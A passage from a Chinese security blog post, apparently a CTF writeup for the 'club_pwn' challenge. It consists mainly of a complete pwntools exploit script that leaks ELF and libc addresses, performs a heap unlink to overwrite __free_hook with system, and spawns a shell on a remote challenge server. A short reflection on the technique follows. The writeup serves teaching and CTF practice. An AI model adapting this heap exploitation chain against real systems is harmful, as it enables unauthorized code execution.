class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> cdll</div><div class="line"></div><div class="line">DEBUG = <span class="number">1</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> DEBUG:</div><div class="line">    context.log_level = <span class="string">"debug"</span></div><div class="line">    r = process(<span class="string">"./club"</span>)</div><div class="line">    e = ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</div><div class="line"><span class="keyword">else</span>:</div><div class="line">    r = remote(<span class="string">"123.206.22.95"</span>, <span class="number">8888</span>)</div><div class="line">    e = ELF(<span class="string">"./libc.so.6"</span>)</div><div class="line"></div><div class="line">malloc_hook = e.symbols[<span class="string">'__malloc_hook'</span>]</div><div class="line">free_hook = e.symbols[<span class="string">'__free_hook'</span>]</div><div class="line">system_address = e.symbols[<span class="string">'system'</span>]</div><div class="line">top_chunk = malloc_hook + <span class="number">0x68</span></div><div class="line">seed_address = <span class="number">0x202148</span></div><div class="line">addr_list = <span class="number">0x202100</span></div><div class="line">one_gadget = <span class="number">0xf0274</span></div><div class="line">puts_got = <span class="number">0x202028</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_box</span><span class="params">(n, l)</span>:</span></div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(<span class="string">"1"</span>)</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(n))</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(l))</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">free_box</span><span class="params">(n)</span>:</span></div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(<span class="string">"2"</span>)</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(n))</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">leave_message</span><span class="params">(n, msg)</span>:</span></div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(<span class="string">"3"</span>)</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(n))</div><div class="line">    r.sendline(msg)</div><div class="line">    </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_message</span><span class="params">(n)</span>:</span></div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(<span class="string">"4"</span>)</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(n))</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">guess_num</span><span class="params">(n)</span>:</span></div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(<span class="string">"5"</span>)</div><div class="line">    r.readuntil(<span class="string">"&gt;"</span>)</div><div class="line">    r.sendline(str(n))</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_rand_num</span><span class="params">()</span>:</span></div><div class="line">    guess_num(<span class="number">123</span>)</div><div class="line">    r.readuntil(<span class="string">"is "</span>)</div><div class="line">    random_num = int(r.readuntil(<span class="string">"!"</span>)[:<span class="number">-1</span>])</div><div class="line">    <span class="keyword">return</span> random_num</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">guest</span><span class="params">(random_num)</span>:</span></div><div class="line">    seed_base = <span class="number">0x202148</span></div><div class="line">    libc = cdll.LoadLibrary(<span class="string">"libc.so.6"</span>)</div><div class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> xrange(<span class="number">0x10000000</span>, <span class="number">0xfffff000</span>, <span class="number">0x1000</span>):</div><div class="line">        libc.srand(x+seed_base)</div><div class="line">        <span class="keyword">if</span> libc.rand() == random_num:</div><div class="line">            next_randnum = libc.rand()</div><div class="line">            <span class="keyword">break</span></div><div class="line">    <span class="keyword">return</span> next_randnum</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_elf_base</span><span class="params">(random_num)</span>:</span></div><div class="line">    guess_num(random_num)</div><div class="line">    r.readuntil(<span class="string">"secret:"</span>)</div><div class="line">    elf_base = int(r.readuntil(<span class="string">"!"</span>)[:<span class="number">-1</span>])</div><div class="line">    <span class="keyword">return</span> elf_base-seed_address</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_libc_base</span><span class="params">()</span>:</span></div><div class="line">    free_box(<span class="number">3</span>)</div><div class="line">    show_message(<span class="number">3</span>)</div><div class="line">    data = r.readuntil(<span class="string">"You"</span>)[:<span class="number">-3</span>].strip()</div><div class="line">    top = u64(data+<span class="string">"\x00\x00"</span>)</div><div class="line">    <span class="keyword">return</span> top - top_chunk</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></div><div class="line">    random_num = get_rand_num()</div><div class="line">    next_randnum = guest(random_num)</div><div class="line">    elf_base = get_elf_base(next_randnum)</div><div class="line">    <span class="keyword">print</span> <span class="string">"get ELF base address: 0x%x"</span>%elf_base</div><div class="line">    create_box(<span class="number">1</span>, <span class="number">24</span>)</div><div class="line">    create_box(<span class="number">2</span>, <span class="number">168</span>)</div><div class="line">    create_box(<span class="number">3</span>, <span class="number">184</span>)</div><div class="line">    create_box(<span class="number">4</span>, <span class="number">200</span>)</div><div class="line">    libc_base = get_libc_base()</div><div class="line">    create_box(<span class="number">5</span>, <span class="number">300</span>)</div><div class="line">    <span class="keyword">print</span> <span class="string">"get libc base address: 0x%x"</span>%libc_base</div><div class="line">    set_list2_size = p64(<span class="number">0xc1</span>)*<span class="number">3</span> + <span class="string">"\xc1"</span></div><div class="line">    leave_message(<span class="number">1</span>, set_list2_size)</div><div class="line">    set_list3 = p64(<span class="number">0</span>) + p64(<span class="number">0xb1</span>) + p64(elf_base+addr_list) + p64(elf_base+addr_list+<span class="number">8</span>)</div><div class="line">    set_list3 += <span class="string">"a"</span>*<span class="number">0x90</span>+p64(<span class="number">0xb0</span>)</div><div class="line">    leave_message(<span class="number">3</span>, set_list3)</div><div class="line">    free_box(<span class="number">2</span>)</div><div class="line">    write_address_list = <span class="string">"/bin/sh\x00"</span> + <span class="string">"a"</span>*<span class="number">8</span> + p64(libc_base+free_hook)</div><div class="line">    leave_message(<span class="number">3</span>, write_address_list)</div><div class="line">    leave_message(<span class="number">2</span>, p64(libc_base+system_address))</div><div class="line">    free_box(<span class="number">3</span>)</div><div class="line">    <span class="comment"># leave_message(3, "aaaaaaaa")</span></div><div class="line">    <span class="comment"># show_message(3)</span></div><div class="line">    r.interactive()</div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    main()</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>unlink原理很早我就知道了，但是却是第一次实践，理论和实际还是差很大的，所以我踩了挺多的坑，花了挺多的时间</p>
<p>我还考虑过fastbin的double free的利用，但是失败了……</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/11/03/0x3C/">看雪CTF 第四题club_pwn writeup</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">Hcamael</a></p>
        <p><span>发布时间:</span>2017-11-03, 11:47:19</p>
        <p><span>最后更新:</span>2017-11-03, 16:11:27</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/11/03/0x3C/" title="看雪CTF 第四题club_pwn writeup">http://0x48.pw/2017/11/03/0x3C/</a>
            <span class="copy-path" data-clipboard-text="原文: http://0x48.pw/2017/11/03/0x3C/　　作者: Hcamael" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>

            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2017/11/11/0x3D/">
                    CTF PWN题之setbuf的利用
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2017/10/30/0x3B/">
                    TP-Link WR941N路由器研究
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#获取ELF基地址"><span class="toc-number">1.</span> <span class="toc-text">获取ELF基地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ELF中的漏洞"><span class="toc-number">2.</span> <span class="toc-text">ELF中的漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#获取LIBC基地址"><span class="toc-number">3.</span> <span class="toc-text">获取LIBC基地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unlink利用"><span class="toc-number">4.</span> <span class="toc-text">unlink利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用"><span class="toc-number">5.</span> <span class="toc-text">利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">6.</span> <span class="toc-text">总结</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-6 i,
        .toc-level-6 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>





    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/11/11/0x3D/" title="上一篇: CTF PWN题之setbuf的利用">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2017/10/30/0x3B/" title="下一篇: TP-Link WR941N路由器研究">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2018/01/17/0x40/">34c3 ctf simpleGC writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/16/0x41/">Pwn学习之house of系列(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/08/0x3F/">CVE-2017-16943 Exim UAF漏洞分析--后续</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/01/0x3E/">CVE-2017-16943 Exim UAF漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/11/0x3D/">CTF PWN题之setbuf的利用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/03/0x3C/">看雪CTF 第四题club_pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/30/0x3B/">TP-Link WR941N路由器研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/04/0x3A/">Pwnhub 2013的国庆 writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/0x39/">HITB CTF 2017 Pwn题研究🙉</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/0x38/">Pwnhub之奇妙的巨蟒 Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/07/0x37/">malloc.c源码阅读之__libc_free</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/01/0x36/">堆溢出学习之0CTF 2017 Babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/25/0x35/">glibc malloc学习笔记之fastbin🐦</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/12/0x34/">对虚拟机进行磁盘扩容🐥</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/23/0x33/">ROP小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/05/0x32/">Triton学习笔记(三)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/03/0x31/">Triton学习笔记(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/02/0x30/">Triton学习笔记(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/20/0x2f/">记一次手撸CPython bytecode</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/17/0x2e/">填坑</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/14/0x2d/">栈溢出之绕过CANARY保护</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/13/0x2c/">Linux系统下格式化字符串利用研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/17/0x2b/">Pwnhub之深入敌后writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/06/0x2a/">CVE-2016-6313 随机数预测分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/28/0x29/">phpmailer RCE 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/28/0x28/">2016 HCTF Crypto 出题总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/21/0x27/">PWN学习总结之基础栈溢出2</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/03/0x26/">PWN学习总结之基础栈溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/14/0x24/">HITCON 2016 Web 总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/12/0x23/">2016 HITCON Crypto -- PAKE(++)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/13/0x22/">php bugs 72663分析(CVE-2016-7124)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/31/0x21/">Cisco ASA RCE 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/16/0x20/">LNMP + phpenv 实现不同虚拟主机使用不同版本的PHP</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/10/0x1F/">CVE-2016-6174漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/14/0x1E/">三个白帽之火币网2W大挑战</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/27/0x1D/">寻找来自星星的你第二期Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/17/0x1C/">三个白帽之招聘又开始了，你怕了吗？-Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/05/10/0x1B/">SCTF Code Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/05/03/0x1A/">GGCTF的对称密码学</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/17/0x19/">How old are Crypto?</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/08/0x18/">MySQLi-Error Injection</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/04/0x17/">Python 使用dpkt分析数据包</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/01/0x16/">CRYPTO技能修正</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/21/0x15/">Pentester Lab Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/17/0x14/">0CTF RSA?总结 || RSA学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/15/0x13/">This is AliCTF?</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/14/0x12/">0CTF总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/07/0x11/">unholy Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/02/14/0x0F/">Nebula Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/19/0x0E/">12.19网络方向培训</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/08/0x0D/">HCTF之Black-Eat-Black总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/01/0x0C/">Python 的 BaseHTTPServer模块分析小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/31/0x0B/">10.31新生培训</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/05/0x09/">不使用select情况下的各种盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/03/0x08/">2015XDCTF低分Web题writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/08/07/0x06/">WeChall Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/22/0x04/">git小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x02/">对于硬盘事件的随想</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x01/">对于这次硬盘坏掉事件小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x00/">跳转到以前的博文</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2015-2018 Hcamael
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 4;
                var backgroundimg = "url(//qn.lazysheep.cc/bg/bg-xxxx.jpg)".replace(/xxxx/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({"tex2jax":{"inlineMath":[["$","$"],["\\(","\\)"]],"skipTags":["script","noscript","style","textarea","pre","code"],"processEscapes":true},"TeX":{"equationNumbers":{"autoNumber":"AMS"}}});
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->
</body>
</html>